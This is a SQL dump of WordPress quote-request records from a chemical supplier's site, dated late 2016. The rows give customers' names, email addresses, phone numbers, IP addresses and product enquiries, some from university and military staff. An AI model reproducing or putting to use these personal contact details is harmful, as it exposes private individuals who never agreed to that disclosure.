INSERT INTO `wp_enquiry_detail_new` VALUES (248, 'David Sheffield', 'david_sheffield@lord.com', 'Hello, I\'m looking for new mold releases to evaluate for our silicone rubber molding manufacturing.  Please send a quote for Releasys 8200.  ', '(814) 217-6669', 'Releasys 8200', '152.50.64.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"297";s:5:"title";s:13:"ReleaSys 8200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys-82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-22 13:09:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (249, 'Pat Hite', 'dhite@mathesongas.com', 'I need a quote for 2 - 5 gallon pails of Vertrel MCA shipped to 300 Dupont St.  West Point, VA 23181', '(804) 843-4873', 'Quote needed for Vertrel MCA', '206.18.165.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-22 19:49:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (250, 'nimesha devindi', 'kndevindi1993@gmail.com', 'can i know the price of EPON 828 resin?', '+940776969393', 'inquiry for price', '123.231.17.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 06:57:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (251, 'Howard Wong', 'howard.wong@birchwood.ca', 'Looking for a supplier in Winnipeg, MB - Canada, for the above product. Thank you.', '(204) 661-9555', 'Dupont Krytox Lubricant (GPL205)', '64.4.81.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 14:05:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (252, 'Geoffrey Bainbridge', 'geoffreybainbridge@nanometrics.ca', 'Hi, I\'d like to get a small quantity of Krytox 240AZ for evaluation.   Thanks.\n\n-Geoff', '(613) 592-6776', 'Krytox 240AZ', '206.191.47.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 14:52:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (253, 'Enrique Marroquin', 'Enrique.Marroquin@ganotecwest.com', 'Hello, I would like to inquire on pricing for 1 gallon of Vertrel MCA for delivery to Edmonton, Alberta. Thank you.', '(780) 948-2647', 'Vertrel MCA', '64.141.127.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 15:58:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (254, 'Bill Boyles', 'Bill@coaltech.comcastbiz.net', 'Could you provide me with the cost per can and also the price per case.  It would be shipping to the Pittsburgh, PA area.', '', 'MS-122AD', '98.239.198.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 19:03:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (255, 'GVWUJ', 'sz7574@sina.com', 'I am going to buy 10 boxes of MS-907 epoxy, please provide price and payment information of the product', '1 626-575-6002', 'Order MS-907 epoxy adhesive', '1.81.78.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-23 23:05:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (256, 'Brian Jordan', 'brian.jordan@liquiglide.com', 'Interested in using Fluoroguard PRO as an alternative within an existing formulation', '(857) 600-2134', 'Quote for Fluoroguard PRO', '73.68.65.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1435";s:5:"title";s:18:"Fluoroguard™ PRO";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pro-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 04:10:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (257, 'Brian Jordan', 'brian.jordan@liquiglide.com', 'Interested in a quote for cleaning agent to remove PFPE oils from plastics.', '(857) 600-2134', 'Cleaning agent', '73.68.65.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1711";s:5:"title";s:26:"PFPE Re-Move™ MS 250/252";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-250.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 04:30:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (258, 'Brian Jordan', 'brian.jordan@liquiglide.com', 'Interested in obtaining a quote to use Suprion as a carrier fluid.  Looking for large volumes and bulk pricing.', '(857) 600-2134', 'Interest in carrier fluid', '73.68.65.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1344";s:5:"title";s:7:"Suprion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-suprion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 04:32:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (259, 'Brian Jordan', 'brian.jordan@liquiglide.com', 'Does this product come in large packaging volumes?', '(857) 600-2134', 'Packaging type', '73.68.65.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1664";s:5:"title";s:15:"TriboSys 110XNB";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:98:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-110xnb-krytox-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 04:34:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (260, 'Michael Mangeng', 'michael.mangeng@hsr.li', 'We would like to know if there are any suppliers of epoxy 907 in Switzerland (Europe) and who they are.', '', 'Buying 5-10 units of epoxy 907', '82.117.2.200', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 08:17:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (261, 'lihongqin', 'sz7574@sina.com', 'I am going to buy 10 boxes of MS-907 epoxy, please provide price and payment information of the product', '1 626-575-6002', 'Order MS-907 epoxy adhesive', '1.81.78.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-24 12:23:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (262, 'Thomas Murgatroyd', 'tmurgy@hotmail.com', 'Hello,\nI am inquiring about the price and availability of 1oz and 2oz syringes and tubes of Krytox 204. Are these available in individual quantities to non-commercial consumers?\nThank you,\nThomas', '', 'Krytox 204 Price', '134.49.234.117', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"788";s:5:"title";s:7:"GPL 204";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_399075487.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-27 16:50:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (263, 'DANE NEETHLING', 'd.neethling@aerotechnic-group.com', 'Please provide me a Quotation for the below Product: \n\nEP0N-828     |      RESIN EPOXY     Qty-1 or MOQ', '', 'JNB075959', '41.76.135.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-28 09:05:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (264, 'Patrick Visser', 'patrick.visser@farmersedge.ca', 'Require small tube of GPL205 (2oz is sufficient). Please quote with shipping to Winnipeg.\n\nThanks!', '1 204-233-4099', 'Quote for 2oz GPL205', '64.4.70.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-28 18:45:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (265, 'Moonkyung Kim', 'mkim194@illinois.edu', 'Hi, I wanted to order this agent for my research. How much is it ? would you please give me quote for this ? Also, can i get a discount if i ordered Epikote 862 (epoxy) together ? I\'m graduate student in UIUC (University of Illinois at Urbana-Champaign). ', '(217) 974-5658', 'Inquiry about quote.', '130.126.177.167', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-28 19:06:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (266, 'Burton R Fisher', 'burton.fisher@us.af.mil', 'Hello,\nNeeding to purchase Epon Resin 828, Epon Resin 862, and Epicure Curing Agent W.  What product sizes are available for resins and curing agent (order would be on the 5 to 10 gallon range for resins or slightly higher)?  Also, would need pricing with delivery to Dayton, Ohio.', '(937) 656-8834', 'Product Availability &amp; Inquiry', '132.3.33.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-28 19:52:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (267, 'Kerim Samedov', 'ksamedov@chem.ubc.ca', 'Dear sir or madam, \n\nI herewith would like to request a quote for one (1) pound of your Krytox low vapor pressure (LVP) high-vacuum grease. \n\nBest regards, \nKerim Samedov, PhD\n_______________________________\nPostdoctoral Fellow\nUniversity of British Columbia\nChemistry Department\nD411-2036 Main Mall\nVancouver, BC, Canada V6T 1Z1\nPhone: 604-314-4375\nEmail: ksamedov@chem.ubc.ca\nhttps://gates.chem.ubc.ca/group-members/', '', 'Krutox  LVP', '137.82.7.196', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:3:"LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-28 20:11:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (268, 'Michelle Boucher', 'mboucher@utica.edu', 'What would the price for a small amount of Krytox 157 FSH be? I need less than 10 g .', '', 'pricing', '4.26.24.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 14:22:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (269, 'Mike McCabe', 'mmccabe@rubbercraft.com', 'Please provide pricing and delivery for above referenced oil.\n\nRegards,\nMike McCabe\nMaterials &amp; Compounding Manager\nRubbercraft Corp. of Calif.', '(562) 354-2855', 'Krytox GPL103', '207.178.166.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 15:47:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (270, 'Tim', 'tim.gazdic@unige.ch', 'Hi, \n\nHas your solving agent MS-111 been tested on EPO-TEK E4110 epoxy glues? If not, has it been tested on comparable epoxy glues? Thank you in advance, \n\nBest wishes, \n\nTim Gazdic', '', 'Solvent', '129.194.51.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 16:16:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (271, 'gvwujlihongqin', 'sz7574@sina.com', 'I want to buy 10 boxes, please provide price, shipping and payment information', '', '', '1.81.64.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 19:03:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (272, 'Tyler Gubb', 'tyler.gubb@glidewelldental.com', 'I would like to purchase 100 g of VASO 67. May I have a quote, please?', '(585) 331-6090', 'VASO 67', '64.58.180.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"575";s:5:"title";s:7:"VAZO 67";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-67-composites.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 19:05:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (273, 'Kevin Person', 'person3@llnl.gov', 'I can you quote a pint of Epon 815C and PH3611?', '(925) 422-0519', 'Resin/Hardener RFQ', '128.115.190.46', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-29 19:39:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (274, 'gvwujlihongqin', 'sz7574@sina.com', '  I want to buy 10 boxes of ms-907 epoxy resin, please provide the product price and payment information as soon as possible.', '', '', '1.81.64.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 00:34:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (275, 'Adam West', 'AdamW@structuralscience.net', 'Dear Sir/ Madam,\n\nI have come across your release agent ReleaSys 8900 and 89, and I would like to know if you have a UK distributor and your price list for both products.\nWe are looking into a new release agent for our products and are interested in using a Siloxane based coating.\n\nOur number is 01229 814340.\nI look forward to hearing from you.\n\nKind regards,\n\nAdam West', '', 'Application information and pricing', '217.41.41.102', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"310";s:5:"title";s:13:"ReleaSys 8900";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_106416161.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 08:52:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (276, 'Tom Brower', 'tbrower@mcauliffes.com', 'Can you please quote my cost for GPL-206-1.75LB\n\nThank you.\n\nTom Brower\nMcAuliffe\'s Industrial\nMarysville, OH  43040', '(937) 645-4422', 'GPL-206-1.75LB Quote', '65.152.1.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 15:06:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (277, 'Dylan Slizewski', 'dylan.slizewski.1@us.af.mil', 'Good Morning,\n\nI\'m looking for a quote on 100 lbs of AIBN.\n', '', 'Bulk Order Vazo 64', '132.3.57.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 15:16:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (278, 'Patrick Szabadka', 'pats@sigmapoint.com', 'good morning,\n\nI\'m looking for a sample of the above oil to replace the current oil we are using (Brial bio30) for our reflow ovens. Since I am in Canada, do I have to deal with a distributor or can I buy direct?', '(613) 937-4462', 'TriboSys 2121', '72.1.213.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1638";s:5:"title";s:13:"TriboSys 212X";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:100:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-high-temperature-chain-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 15:26:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (279, 'arthur Guyon', 'arthur.guyon@sncorp.com', 'would like a quote on MS-555', '(775) 849-6273', 'Quote for MS-555', '12.231.151.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 17:21:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (280, 'Raven Toulan', 'faye.r.toulan.ctr@mail.mil', 'Please provide a price quote for 4 ( 4 liter bottles) of Epon 862 as soon as possible.  I will also require the SDS ', '(410) 306-0768', 'Price quote', '128.63.162.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 19:01:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (281, 'Raven Toulan', 'faye.r.toulan.ctr@mail.mil', 'Please provide a quote via email for (4) gallons of Epon Resin 862.  Please provide all contact information so that a purchase order can be set up ASAP.  This is for the Army Research Laboratory located at Aberdeen Proving Ground in Maryland.', '(410) 306-0768', 'Epon 862', '128.63.162.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 20:41:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (282, ' jean montagu', 'jeanmontagu@gmail.com', 'I have run out of material specified to expire Jan 24 1991.\n\nIt i still very strong. ', '(617) 939-1961', 'Epoxy MS 907', '73.149.247.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-30 21:50:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (283, 'Chad Chichester', 'chad.chichester@dowcorning.com', 'What is the base oil viscosity of this grease at 100C?', '(989) 615-2084', 'Base oil viscosity at 100C', '151.163.2.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"984";s:5:"title";s:7:"FPG 028";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:96:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-fpg-028-4-e1474477915984.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-01 14:48:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (284, 'Xiaoxiao Hou', 'xiaoxiao_hou@brown.edu', 'Hello! May I get a price quote for cleaning agent MS-722? The dedicated purpose is to remove oils on PCB surface. Thanks!', '(401) 749-1074', 'Price inquiry for MS-722', '128.148.231.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1706";s:5:"title";s:10:"MS-720/722";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-01 17:18:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (285, 'JOHN HART', 'jhart3644@sbcglobal.net', 'PLEASE HELP ME WITH THE MS-260 CLEANER\nCAN I BUY FROM A DISTRIBUTOR?', '(817) 448-0603', 'PRICE FOR MS-260', '99.178.187.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-02 15:25:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (286, 'Peter Maehling', 'peter.maehling@avl.com', 'Qty 6 (or approx. if price breaks are close) 14oz aerosol cans', '(734) 446-4327', 'MS-580N', '198.202.236.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-02 17:02:58', '', NULL, '', '', '', NULL, '', ''); 
